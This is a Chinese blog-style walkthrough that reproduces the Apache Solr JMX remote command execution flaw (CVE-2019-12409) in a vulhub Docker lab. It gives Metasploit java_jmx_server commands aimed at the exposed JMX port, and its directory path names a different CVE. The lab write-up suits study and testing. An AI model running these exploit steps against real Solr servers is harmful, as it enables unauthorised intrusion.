Apache Solr 遠程命令執行漏洞(CVE-2019-12409)

Apache Solr 遠程命令執行漏洞(CVE-2019-12409)

前言

影響Apache Solr 8.1.1到8.2.0版本

環境搭建

啓動docker

systemctl start docker

獲取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

進入對應目錄

cd vulhub/solr/CVE-2019-17558/

修改配置
docker-compose.yml

version: '2'
services:
 solr:
   command: solr-demo
   image: vulhub/solr:8.2.0
   ports:
    - "8983:8983"
    - "18983:18983"

啓動容器

docker-compose up -d

查看容器

docker ps

在這裏插入圖片描述

漏洞復現

進入docker容器查看配置(a0爲docker ps中的容器id)

docker exec -it a0 /bin/bash
cd bin
cat solr.in.sh.orig

在這裏插入圖片描述
在這裏插入圖片描述
存在ENABLE_REMOTE_JMX_OPTS="true"
配置msf

msfconsole
use exploit/multi/misc/java_jmx_server
set rhosts 192.168.164.162
set rport 18983
run

在這裏插入圖片描述

參考文章

https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章